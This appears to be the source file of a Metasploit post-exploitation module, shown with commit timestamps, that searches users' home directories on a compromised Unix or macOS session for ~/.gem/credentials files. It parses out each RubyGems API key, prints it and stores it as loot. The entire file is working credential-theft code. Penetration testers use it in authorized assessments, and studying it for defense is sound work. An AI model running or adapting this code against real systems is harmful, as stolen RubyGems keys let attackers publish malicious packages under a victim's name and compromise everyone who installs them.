metasploit-framework/modules/post/multi/gather/rubygems_api_key.rb

66 lines
1.8 KiB
Ruby
Raw Normal View History

2015-01-27 01:53:39 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'yaml'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info={})
super( update_info( info,
2015-01-27 04:08:43 +00:00
'Name' => 'Multi RubyGems API Key Gather ./gem/credentials',
2015-01-27 01:53:39 +00:00
'Description' => %q{
2015-01-27 04:10:08 +00:00
This module obtains a user's RubyGems API key from ~/.gem/credentials.
2015-01-27 01:53:39 +00:00
},
'License' => MSF_LICENSE,
'Author' => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
'Brandon Myers <bmyers[at]trustwave.com>' ],
'Platform' => %w{ bsd linux osx unix },
2015-01-27 04:13:17 +00:00
'SessionTypes' => %w{ shell }
2015-01-27 01:53:39 +00:00
))
end
def run
print_status("Finding .gem/credentials")
paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
paths = paths.select { |f| file?(f) }
if paths.nil? or paths.empty?
print_error("No users found with a .gem/credentials file")
return
end
download_loot(paths)
end
def download_loot(paths)
print_status("Looting #{paths.count} files")
paths.each do |path|
path.chomp!
next if [".", ".."].include?(path)
if key = YAML.load(read_file(path))[:rubygems_api_key]
rubygems_api_key = key
2015-01-27 03:13:15 +00:00
else
2015-01-27 03:26:56 +00:00
next
2015-01-27 01:53:39 +00:00
end
2015-01-27 03:13:15 +00:00
print_good("Found a RubyGems API Key: #{rubygems_api_key}")
2015-01-27 01:53:39 +00:00
2015-01-27 03:13:15 +00:00
loot_path = store_loot("host.rubygems.apikey",
"text/plain",
session,
rubygems_api_key,
"ruby_api_key.txt",
"Ruby API Key")
2015-01-27 03:01:38 +00:00
2015-01-27 03:13:15 +00:00
print_status("RubyGems API Key stored in: #{loot_path.to_s}")
2015-01-27 01:53:39 +00:00
end
end
2015-01-27 03:30:26 +00:00
end